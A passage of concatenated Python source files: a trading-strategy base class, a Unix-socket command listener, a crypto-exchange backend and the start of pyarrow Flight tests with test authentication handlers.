self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
# if len(self._cached_data) == self._num_cached:
# self.isupdate = True
if len(self._cached_data) > 3 * self._num_cached:
# 控制缓存数据量
self._cached_data = self._cached_data[self._num_cached:]
data = pd.DataFrame(self._cached_data).loc[:, [
'datetime', 'last_price', 'volume']]
data = data.assign(datetime=pd.to_datetime(data.datetime)).set_index('datetime').resample(
self.frequence).apply({'last_price': 'ohlc', 'volume': 'last'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.assign(volume=data.volume.diff(),
code=self.new_data['symbol'])
data = data.reset_index().set_index(['datetime', 'code'])
self.acc.on_price_change(
self.new_data['symbol'], self.latest_price[self.new_data['symbol']])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
self.running_time = self.new_data['datetime']
# print(data.iloc[-1].index[0])
if self.dt != data.index[-1][0]:
self.isupdate = True
self.dt = data.index[-1][0]
self.upcoming_data(data.tail(1))
def tick_callback(self, a, b, c, body):
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['symbol']
] = self.new_data['last_price']
self.running_time = self.new_data['datetime']
self.on_tick(self.new_data)
def get_code_marketdata(self, code):
return self.market_data.loc[(slice(None), code), :]
def get_current_marketdata(self):
return self.market_data.loc[(self.running_time, slice(None)), :]
def callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self.latest_price[self.new_data['code']] = self.new_data['close']
if self.dt != str(self.new_data['datetime'])[0:16]:
# [0:16]是分钟线位数
self.dt = str(self.new_data['datetime'])[0:16]
self.isupdate = True
self.acc.on_price_change(self.new_data['code'], self.new_data['close'])
# .loc[:, ['open', 'high', 'low', 'close', 'volume', 'tradetime']]
bar = pd.DataFrame([self.new_data]).set_index(['datetime', 'code'])
now = datetime.datetime.now()
if now.hour == 20 and now.minute == 59 and now.second < 10:
self.daily_func()
time.sleep(10)
# res = self.job_control.find_one(
# {'strategy_id': self.strategy_id, 'strategy_id': self.strategy_id})
# self.control_status(res)
self.running_time = self.new_data['datetime']
self.upcoming_data(bar)
def control_status(self, res):
print(res)
def add_subscriber(self, qaproid):
"""Add a subscriber
增加订阅者的QAPRO_ID
"""
self.subscriber_client.insert_one(
{'strategy_id': self.strategy_id, 'user_id': qaproid})
@property
def subscriber_list(self):
"""订阅者
Returns:
[type] -- [description]
"""
return list(set([item['user_id'] for item in self.subscriber_client.find({'strategy_id': self.strategy_id})]))
def load_strategy(self):
raise NotImplementedError
def on_dailyopen(self):
pass
def on_dailyclose(self):
pass
def on_bar(self, bar):
raise NotImplementedError
def on_tick(self, tick):
raise NotImplementedError
def _on_1min_bar(self):
# raise NotImplementedError
if len(self._systemvar.keys()) > 0:
self._signal.append(copy.deepcopy(self._systemvar))
try:
self.on_1min_bar()
except:
pass
def on_deal(self, order):
"""
order is a dict type
"""
print('------this is on deal message ------')
print(order)
def on_1min_bar(self):
raise NotImplementedError
def on_5min_bar(self):
raise NotImplementedError
def on_15min_bar(self):
raise NotImplementedError
def on_30min_bar(self):
raise NotImplementedError
def order_handler(self):
self._orders = {}
def daily_func(self):
QA.QA_util_log_info('DAILY FUNC')
def risk_check(self):
pass
def plot(self, name, data, format):
""" plot是可以存储你的临时信息的接口, 后期会接入可视化
Arguments:
name {[type]} -- [description]
data {[type]} -- [description]
format {[type]} -- [description]
"""
self._systemvar[name] = {'datetime': copy.deepcopy(str(
self.running_time)), 'value': data, 'format': format}
def get_code(self):
if isinstance(self.code, str):
return self.code
else:
return self.code[0]
def check_order(self, direction, offset, code=None):
"""[summary]
同方向不开仓 只对期货市场做限制
buy - open
sell - close
"""
if code == None:
code = self.get_code()
if self.market_type == QA.MARKET_TYPE.FUTURE_CN:
if self.last_order_towards[code][direction] == str(offset):
return False
else:
return True
else:
return True
def on_ordererror(self, direction, offset, price, volume):
print('order Error ')
def receive_simpledeal(self,
code: str,
trade_time,
trade_amount,
direction,
offset,
trade_price,
message='sell_open'):
self.send_order(direction=direction, offset=offset,
volume=trade_amount, price=trade_price, order_id=QA.QA_util_random_with_topic(self.strategy_id))
def send_order(self, direction='BUY', offset='OPEN', price=3925, volume=10, order_id='', code=None):
if code == None:
code = self.get_code()
if offset == '':
towards = eval('ORDER_DIRECTION.{}'.format(direction))
else:
towards = eval('ORDER_DIRECTION.{}_{}'.format(direction, offset))
order_id = str(uuid.uuid4()) if order_id == '' else order_id
if isinstance(price, float):
pass
elif isinstance(price, pd.Series):
price = price.values[0]
if self.running_mode == 'sim':
# 在此处拦截无法下单的订单
if (direction == 'BUY' and self.latest_price[code] <= price) or (
direction == 'SELL' and self.latest_price[code] >= price):
QA.QA_util_log_info(
'============ {} SEND ORDER =================='.format(order_id))
QA.QA_util_log_info('direction{} offset {} price{} volume{}'.format(
direction, offset, price, volume))
if self.check_order(direction, offset, code=code):
# self.last_order_towards = {'BUY': '', 'SELL': ''}
self.last_order_towards[code][direction] = offset
now = str(datetime.datetime.now())
order = self.acc.send_order(
code=code, towards=towards, price=price, amount=volume, order_id=order_id)
print(order)
order['topic'] = 'send_order'
self.pub.pub(
json.dumps(order), routing_key=self.strategy_id)
self.acc.make_deal(order)
self.on_deal(order)
self.bar_order['{}_{}'.format(
direction, offset)] = self.bar_id
if self.send_wx:
for user in self.subscriber_list:
QA.QA_util_log_info(self.subscriber_list)
try:
requests.post(
'http://www.yutiansut.com/signal?user_id={}&template={}&strategy_id={}&realaccount={}&code={}&order_direction={}&order_offset={}&price={}&volume={}&order_time={}'.format(
user, "xiadan_report", self.strategy_id, self.acc.user_id, code.lower(),
direction, offset, price, volume, now))
except Exception as e:
QA.QA_util_log_info(e)
else:
QA.QA_util_log_info('failed in ORDER_CHECK')
else:
self.on_ordererror(direction, offset, price, volume)
elif self.running_mode == 'backtest':
self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id
if self.market_type == 'stock_cn':
order = self.acc.send_order(
code=code, amount=volume, time=self.running_time, towards=towards, price=price)
order.trade(order.order_id, order.price,
order.amount, order.datetime)
self.on_deal(order.to_dict())
else:
self.acc.receive_simpledeal(
code=code, trade_time=self.running_time, trade_towards=towards, trade_amount=volume,
trade_price=price, order_id=order_id, realorder_id=order_id, trade_id=order_id)
self.on_deal({
'code': code,
'trade_time': self.running_time,
'trade_towards': towards,
'trade_amount': volume,
'trade_price': price,
'order_id': order_id,
'realorder_id': order_id,
'trade_id': order_id
})
self.positions = self.acc.get_position(code)
def update_account(self):
if self.running_mode == 'sim':
QA.QA_util_log_info('{} UPDATE ACCOUNT'.format(
str(datetime.datetime.now())))
self.accounts = self.acc.account_msg
self.orders = self.acc.orders
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
self.trades = self.acc.trades
self.updatetime = self.acc.dtstr
self.on_sync()
elif self.running_mode == 'backtest':
if isinstance(self.code, str):
self.positions = self.acc.get_position(self.code)
else:
pass
def get_exchange(self, code):
return self.market_preset.get_exchange(code)
def get_positions(self, code):
if self.running_mode == 'sim':
self.update_account()
return self.acc.get_position(code)
elif self.running_mode == 'backtest':
return self.acc.get_position(code)
def get_cash(self):
if self.running_mode == 'sim':
self.update_account()
return self.accounts.get('available', '')
elif self.running_mode == 'backtest':
return self.acc.cash_available
def run(self):
while True:
time.sleep(self.risk_check_gap)
self.risk_check()
if __name__ == '__main__':
QAStrategyCTABase(code='rb2005').run()
|
commandsocket.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import os
import socket
import threading
import queue
class CommandSocket(object):
log = logging.getLogger("apimon.CommandSocket")
def __init__(self, path):
self.running = False
self.path = path
self.queue = queue.Queue()
def start(self):
self.running = True
if os.path.exists(self.path):
os.unlink(self.path)
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.bind(self.path)
self.socket.listen(1)
self.socket_thread = threading.Thread(target=self._socketListener)
self.socket_thread.daemon = True
self.socket_thread.start()
def stop(self):
# First, wake up our listener thread with a connection and
# tell it to stop running.
self.running = False
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.connect(self.path)
s.sendall(b'_stop\n')
# The command '_stop' will be ignored by our listener, so
# directly inject it into the queue so that consumers of this
# class which are waiting in .get() are awakened. They can
# either handle '_stop' or just ignore the unknown command and
# then check to see if they should continue to run before
# re-entering their loop.
self.queue.put(b'_stop')
self.socket_thread.join()
self.socket.close()
if os.path.exists(self.path):
os.unlink(self.path)
def _socketListener(self):
while self.running:
try:
s, addr = self.socket.accept()
self.log.debug("Accepted socket connection %s" % (s,))
buf = b''
while True:
buf += s.recv(1)
if buf[-1:] == b'\n':
break
buf = buf.strip()
self.log.debug("Received %s from socket" % (buf,))
s.close()
# Because we use '_stop' internally to wake up a
# waiting thread, don't allow it to actually be
# injected externally.
if buf != b'_stop':
self.queue.put(buf)
except Exception:
self.log.exception("Exception in socket handler")
def get(self):
if not self.running:
raise Exception("CommandSocket.get called while stopped")
return self.queue.get()
|
backend.py
|
import json
import logging
import os
import queue
import signal
import socket
import threading
from datetime import timedelta
from types import TracebackType
from typing import Optional, Type
import requests
import sqlalchemy.orm
from common.constants import ADMIN_UUID, CURRENCY_TO_BLOCKCHAIN, Blockchain, Currency
from common.utils.grpc_server import GRPCServer
from common.utils.spinner import Spinner
from common.utils.sqlalchemy_engine import make_sqlalchemy_engine
from sqlalchemy.exc import OperationalError
from backend.config import BackendConfig
from backend.services.account import AccountService
from backend.services.audit_gen.account import AuditGenAccountService
from backend.services.audit_gen.account_delta_group import (
AuditGenAccountDeltaGroupService,
)
from backend.services.audit_gen.audit import AuditGenService
from backend.services.audit_gen.key import AuditGenKeyService
from backend.services.audit_gen.key_account import AuditGenKeyAccountService
from backend.services.audit_gen.key_account_liability import (
AuditGenKeyAccountLiabilityService,
)
from backend.services.audit_gen.key_currency_asset import (
AuditGenKeyCurrencyAssetService,
)
from backend.services.audit_gen.user_cumulative_liability import (
AuditGenUserCumulativeLiabilityService,
)
from backend.services.audit_gen.user_key import AuditGenUserKeyService
from backend.services.auth import AuthService
from backend.services.deposit import DepositService
from backend.services.exchange import ExchangeService
from backend.services.marketdata import MarketdataService
from backend.services.withdrawal import WithdrawalService
from backend.sql.base import Base
from backend.sql.key import Key
from backend.sql.key_currency_account import KeyCurrencyAccount
from backend.utils.blockchain_client.btc import BTCClient
from backend.utils.blockchain_client.client import BlockchainClient
from backend.utils.blockchain_client.eth import ETHClient
from backend.utils.jwt_client import JWTClient
from backend.utils.key_client import KeyClient
from backend.utils.marketdata_client import MarketdataClient
from backend.utils.webauthn_client import WebauthnClient
LOGGER = logging.getLogger(__name__)
SERVICE_NAMES = [
"Account",
"AuditGen",
"AuditGenAccount",
"AuditGenAccountDeltaGroup",
"AuditGenKey",
"AuditGenKeyAccount",
"AuditGenKeyAccountLiability",
"AuditGenKeyCurrencyAsset",
"AuditGenUserCurrencyLiability",
"AuditGenUserKey",
"Auth",
"Depost",
"Exchange",
"Marketdata",
"Withdrawal",
]
class Backend:
def __init__(self, config: BackendConfig) -> None:
self.sqlalchemy_engine = make_sqlalchemy_engine(config.sqlalchemy_config)
Base.metadata.create_all(self.sqlalchemy_engine)
self.sessionmaker = sqlalchemy.orm.sessionmaker(bind=self.sqlalchemy_engine)
self.jwt_client = JWTClient(config.jwt_config)
self.key_client = KeyClient(self.sessionmaker, config.deposit_key_decoy_set_size)
self.eth_client = ETHClient(config.eth_config, self.key_client, self.sessionmaker)
self.btc_client = BTCClient(self.sessionmaker, config.btc_config, self.key_client)
self.blockchain_client = BlockchainClient(self.eth_client, self.btc_client, self.sessionmaker)
self.webauthn_client = WebauthnClient(config.webauthn_config)
self.marketdata_client = MarketdataClient(self.sessionmaker, config.exchange_rate_spread)
self.config = config
self.grpc_server = GRPCServer(config.grpc_server_config)
self.stopped = False
AuthService(self.sessionmaker, self.jwt_client, self.webauthn_client, self.grpc_server.grpc_server)
AccountService(self.sessionmaker, self.jwt_client, self.webauthn_client, self.grpc_server.grpc_server)
DepositService(
self.sessionmaker,
self.jwt_client,
self.key_client,
self.blockchain_client,
config.deposit_faucet_amounts,
self.grpc_server.grpc_server,
)
MarketdataService(
self.sessionmaker,
self.jwt_client,
self.marketdata_client,
self.blockchain_client,
self.grpc_server.grpc_server,
)
ExchangeService(
self.sessionmaker,
self.jwt_client,
self.webauthn_client,
config.account_anonymity_set_size,
self.grpc_server.grpc_server,
)
WithdrawalService(
self.sessionmaker,
self.jwt_client,
self.webauthn_client,
config.account_anonymity_set_size,
self.blockchain_client,
self.key_client,
self.grpc_server.grpc_server,
)
AuditGenAccountDeltaGroupService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.blockchain_client
)
AuditGenAccountService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenService(
self.sessionmaker,
self.jwt_client,
self.grpc_server.grpc_server,
self.blockchain_client,
self.marketdata_client,
)
AuditGenKeyAccountLiabilityService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.blockchain_client, self.key_client
)
AuditGenKeyCurrencyAssetService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.key_client
)
AuditGenKeyAccountService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenKeyService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenUserKeyService(self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server)
AuditGenUserCumulativeLiabilityService(
self.sessionmaker, self.jwt_client, self.grpc_server.grpc_server, self.blockchain_client, self.key_client
)
self.blockchain_processing_threads = [
threading.Thread(target=self.blockchain_processing_loop, kwargs={"blockchain": blockchain})
for blockchain in Blockchain
]
self.marketdata_thread = threading.Thread(target=self.marketdata_loop)
self.faucet_thread = threading.Thread(target=self.faucet_loop)
def faucet_loop(self) -> None:
if self.config.deposit_faucet_amounts is None:
return
# inject the institution with funds so we can create anonymity sets and process withdrawals
# without relying on users to deposit funds or use the faucet
admin_key_uuid = self.key_client.make_new_hot_key()
spinner = Spinner(timedelta(seconds=10)) # only do a deposit once every n seconds to limit inflation haha
with self.sessionmaker() as session:
row_count = (
session.query(KeyCurrencyAccount)
.filter(KeyCurrencyAccount.key_uuid == admin_key_uuid, KeyCurrencyAccount.account_uuid == ADMIN_UUID)
.update(
{
KeyCurrencyAccount.pending_admin_deposits: KeyCurrencyAccount.pending_admin_deposits + 1,
}
)
)
assert row_count == len(Currency), "should have one update per currency"
key = session.query(Key).filter(Key.key_uuid == admin_key_uuid).one()
currency_to_address = {currency: key.get_address(CURRENCY_TO_BLOCKCHAIN[currency]) for currency in Currency}
session.commit()
while not self.stopped:
if not spinner():
continue
try:
for currency, amount in self.config.deposit_faucet_amounts.items():
LOGGER.info("faucet loop -- infusing the institution with %s %s", currency, amount)
address = currency_to_address[currency]
self.blockchain_client.deposit(address, currency, amount)
except (OperationalError, socket.timeout, queue.Empty):
LOGGER.warning("Error in facuet loop, but retrying on next timestamp", exc_info=True)
except: # pylint: disable=bare-except
LOGGER.error("Fatal exception from the facuet loop", exc_info=True)
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM)
def marketdata_loop(self) -> None:
spinner = Spinner(timedelta(seconds=1)) # update the quotes once per second
while not self.stopped:
if not spinner():
continue
try:
self.marketdata_client.update_quotes()
except (json.JSONDecodeError, requests.exceptions.HTTPError, requests.exceptions.ConnectionError):
pass
except: # pylint: disable=bare-except
LOGGER.error("Fatal exception from the marketdata loop", exc_info=True)
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM)
def blockchain_processing_loop(self, blockchain: Blockchain) -> None:
spinner = Spinner(timedelta(seconds=1)) # check once per second
while not self.stopped:
if not spinner():
continue
try:
latest_processed_block_number = self.blockchain_client.get_latest_processed_block_number(blockchain)
if latest_processed_block_number is None:
block_to_process = self.blockchain_client.get_start_block_number(blockchain)
else:
block_to_process = latest_processed_block_number + 1
latest_blockchain_block_number = self.blockchain_client.get_latest_block_number_from_chain(blockchain)
LOGGER.info("latest_blockchain_block_number for %s is %d", blockchain, latest_blockchain_block_number)
if block_to_process <= latest_blockchain_block_number and (not self.stopped):
LOGGER.info("Processing block(%d) on blockchain(%s)", block_to_process, blockchain)
self.blockchain_client.process_block(blockchain, block_to_process)
LOGGER.info("Finished processing block(%d) on blockchain(%s)", block_to_process, blockchain)
block_to_process += 1
except (OperationalError, socket.timeout, queue.Empty, requests.exceptions.ConnectionError):
LOGGER.warning(
"Error processing block on blockchain(%s), but retrying on next timestamp",
blockchain,
exc_info=True,
)
except: # pylint: disable=bare-except
LOGGER.error(
"Fatal exception from the blockchain processing loop for blockchain(%s)", blockchain, exc_info=True
)
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM)
# skipping OperationalError's since they represent db errors outside our control
# like failed transactions or locks
# it's fine, we'll just process this block on the next tick
def start(self) -> None:
LOGGER.info("Starting the faucet thread")
self.faucet_thread.start()
LOGGER.info("Starting the marketdata thread")
self.marketdata_thread.start()
LOGGER.info("Starting the blockchain processing threads")
for thread in self.blockchain_processing_threads:
thread.start()
LOGGER.info("Starting the grpc server")
self.grpc_server.start()
LOGGER.info("Backend started")
def __enter__(self) -> "Backend":
self.start()
return self
def stop(self) -> None:
self.stopped = True
LOGGER.info("Stopping the grpc server")
self.grpc_server.stop()
LOGGER.info("Joining the blockchian processing threads")
for thread in self.blockchain_processing_threads:
thread.join()
LOGGER.info("Joining the marketdata thread to stop")
self.marketdata_thread.join()
LOGGER.info("Joining the faucet thread")
self.faucet_thread.join()
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> None:
self.stop()
|
test_flight.py
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import base64
import os
import struct
import tempfile
import threading
import time
import traceback
import pytest
import pyarrow as pa
from pyarrow.compat import tobytes
from pyarrow.util import pathlib, find_free_port
try:
from pyarrow import flight
from pyarrow.flight import (
FlightClient, FlightServerBase,
ServerAuthHandler, ClientAuthHandler,
ServerMiddleware, ServerMiddlewareFactory,
ClientMiddleware, ClientMiddlewareFactory,
)
except ImportError:
flight = None
FlightClient, FlightServerBase = object, object
ServerAuthHandler, ClientAuthHandler = object, object
ServerMiddleware, ServerMiddlewareFactory = object, object
ClientMiddleware, ClientMiddlewareFactory = object, object
# Marks all of the tests in this module
# Ignore these with pytest ... -m 'not flight'
pytestmark = pytest.mark.flight
def test_import():
# So we see the ImportError somewhere
import pyarrow.flight # noqa
def resource_root():
"""Get the path to the test resources directory."""
if not os.environ.get("ARROW_TEST_DATA"):
raise RuntimeError("Test resources not found; set "
"ARROW_TEST_DATA to <repo root>/testing")
return pathlib.Path(os.environ["ARROW_TEST_DATA"]) / "flight"
def read_flight_resource(path):
"""Get the contents of a test resource file."""
root = resource_root()
if not root:
return None
try:
with (root / path).open("rb") as f:
return f.read()
except FileNotFoundError:
raise RuntimeError(
"Test resource {} not found; did you initialize the "
"test resource submodule?\n{}".format(root / path,
traceback.format_exc()))
def example_tls_certs():
"""Get the paths to test TLS certificates."""
return {
"root_cert": read_flight_resource("root-ca.pem"),
"certificates": [
flight.CertKeyPair(
cert=read_flight_resource("cert0.pem"),
key=read_flight_resource("cert0.key"),
),
flight.CertKeyPair(
cert=read_flight_resource("cert1.pem"),
key=read_flight_resource("cert1.key"),
),
]
}
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)
])
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
def __init__(self, location=None, **kwargs):
super(ConstantFlightServer, self).__init__(location, **kwargs)
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table)
class MetadataFlightServer(FlightServerBase):
"""A Flight server that numbers incoming/outgoing data."""
def do_get(self, context, ticket):
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
return flight.GeneratorStream(
table.schema,
self.number_batches(table))
def do_put(self, context, descriptor, reader, writer):
counter = 0
expected_data = [-10, -5, 0, 5, 10]
while True:
try:
batch, buf = reader.read_chunk()
assert batch.equals(pa.RecordBatch.from_arrays(
[pa.array([expected_data[counter]])],
['a']
))
assert buf is not None
client_counter, = struct.unpack('<i', buf.to_pybytes())
assert counter == client_counter
writer.write(struct.pack('<i', counter))
counter += 1
except StopIteration:
return
@staticmethod
def number_batches(table):
for idx, batch in enumerate(table.to_batches()):
buf = struct.pack('<i', idx)
yield batch, buf
class EchoFlightServer(FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self, location=None, expected_schema=None, **kwargs):
super(EchoFlightServer, self).__init__(location, **kwargs)
self.last_message = None
self.expected_schema = expected_schema
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader, writer):
if self.expected_schema:
assert self.expected_schema == reader.schema
self.last_message = reader.read_all()
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(max_chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return iter([flight.Result(context.peer_identity())])
raise NotImplementedError
class GetInfoFlightServer(FlightServerBase):
"""A Flight server that tests GetFlightInfo."""
def get_flight_info(self, context, descriptor):
return flight.FlightInfo(
pa.schema([('a', pa.int32())]),
descriptor,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
def get_schema(self, context, descriptor):
info = self.get_flight_info(context, descriptor)
return flight.SchemaResult(info.schema)
class ListActionsFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
@classmethod
def expected_actions(cls):
return [
("action-1", "description"),
("action-2", ""),
flight.ActionType("action-3", "more detail"),
]
def list_actions(self, context):
for action in self.expected_actions():
yield action
class ListActionsErrorFlightServer(FlightServerBase):
"""A Flight server that tests ListActions."""
def list_actions(self, context):
yield ("action-1", "")
yield "foo"
class CheckTicketFlightServer(FlightServerBase):
"""A Flight server that compares the given ticket to an expected value."""
def __init__(self, expected_ticket, location=None, **kwargs):
super(CheckTicketFlightServer, self).__init__(location, **kwargs)
self.expected_ticket = expected_ticket
def do_get(self, context, ticket):
assert self.expected_ticket == ticket.ticket
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
return flight.RecordBatchStream(table)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class InvalidStreamFlightServer(FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
assert data1.type != data2.type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class SlowFlightServer(FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_get(self, context, ticket):
return flight.GeneratorStream(pa.schema([('a', pa.int32())]),
self.slow_stream())
def do_action(self, context, action):
time.sleep(0.5)
return iter([])
@staticmethod
def slow_stream():
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
yield pa.Table.from_arrays(data1, names=['a'])
# The second message should never get sent; the client should
# cancel before we send this
time.sleep(10)
yield pa.Table.from_arrays(data1, names=['a'])
class ErrorFlightServer(FlightServerBase):
"""A Flight server that uses all the Flight-specific errors."""
def do_action(self, context, action):
if action.type == "internal":
raise flight.FlightInternalError("foo")
elif action.type == "timedout":
raise flight.FlightTimedOutError("foo")
elif action.type == "cancel":
raise flight.FlightCancelledError("foo")
elif action.type == "unauthenticated":
raise flight.FlightUnauthenticatedError("foo")
elif action.type == "unauthorized":
raise flight.FlightUnauthorizedError("foo")
raise NotImplementedError
def list_flights(self, context, criteria):
yield flight.FlightInfo(
pa.schema([]),
flight.FlightDescriptor.for_path('/foo'),
[],
-1, -1
)
raise flight.FlightInternalError("foo")
class HttpBasicServerAuthHandler(ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super(HttpBasicServerAuthHandler, self).__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
buf = incoming.read()
auth = flight.BasicAuth.deserialize(buf)
if auth.username not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
if self.creds[auth.username] != auth.password:
raise flight.FlightUnauthenticatedError("wrong password")
outgoing.write(tobytes(auth.username))
def is_valid(self, token):
if not token:
raise flight.FlightUnauthenticatedError("token not provided")
if token not in self.creds:
raise flight.FlightUnauthenticatedError("unknown user")
return token
class HttpBasicClientAuthHandler(ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super(HttpBasicClientAuthHandler, self).__init__()
self.basic_auth = flight.BasicAuth(username, password)
self.token = None
def authenticate(self, outgoing, incoming):
auth = self.basic_auth.serialize()
outgoing.write(auth)
self.token = incoming.read()
def get_token(self):
return self.token
class TokenServerAuthHandler(ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super(TokenServerAuthHandler, self).__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise flight.FlightUnauthenticatedError(
"invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise flight.FlightUnauthenticatedError("invalid token")
return token[7:]
class TokenClientAuthHandler(ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super(TokenClientAuthHandler, self).__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
class HeaderServerMiddleware(ServerMiddleware):
"""Expose a per-call value to the RPC method body."""
def __init__(self, special_value):
self.special_value = special_value
class HeaderServerMiddlewareFactory(ServerMiddlewareFactory):
"""Expose a per-call hard-coded value to the RPC method body."""
def start_call(self, info, headers):
return HeaderServerMiddleware("right value")
class HeaderFlightServer(FlightServerBase):
"""Echo back the per-call hard-coded value."""
def do_action(self, context, action):
middleware = context.get_middleware("test")
if middleware:
return iter([flight.Result(middleware.special_value.encode())])
return iter([flight.Result("".encode())])
class SelectiveAuthServerMiddlewareFactory(ServerMiddlewareFactory):
"""Deny access to certain methods based on a header."""
def start_call(self, info, headers):
if info.method == flight.FlightMethod.LIST_ACTIONS:
# No auth needed
return
token = headers.get("x-auth-token")
if not token:
raise flight.FlightUnauthenticatedError("No token")
token = token[0]
if token != "password":
raise flight.FlightUnauthenticatedError("Invalid token")
return HeaderServerMiddleware(token)
class SelectiveAuthClientMiddlewareFactory(ClientMiddlewareFactory):
def start_call(self, info):
return SelectiveAuthClientMiddleware()
class SelectiveAuthClientMiddleware(ClientMiddleware):
def sending_headers(self):
return {
"x-auth-token": "password",
}
def test_flight_server_location_argument():
locations = [
None,
'grpc://localhost:0',
('localhost', find_free_port()),
]
for location in locations:
with FlightServerBase(location) as server:
assert isinstance(server, FlightServerBase)
def test_server_exit_reraises_exception():
with pytest.raises(ValueError):
with FlightServerBase():
raise ValueError()
@pytest.mark.slow
def test_client_wait_for_available():
location = ('localhost', find_free_port())
server = None
def serve():
global server
time.sleep(0.5)
server = FlightServerBase(location)
server.serve()
client = FlightClient(location)
thread = threading.Thread(target=serve, daemon=True)
thread.start()
started = time.time()
client.wait_for_available(timeout=5)
elapsed = time.time() - started
assert elapsed >= 0.5
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.pandas
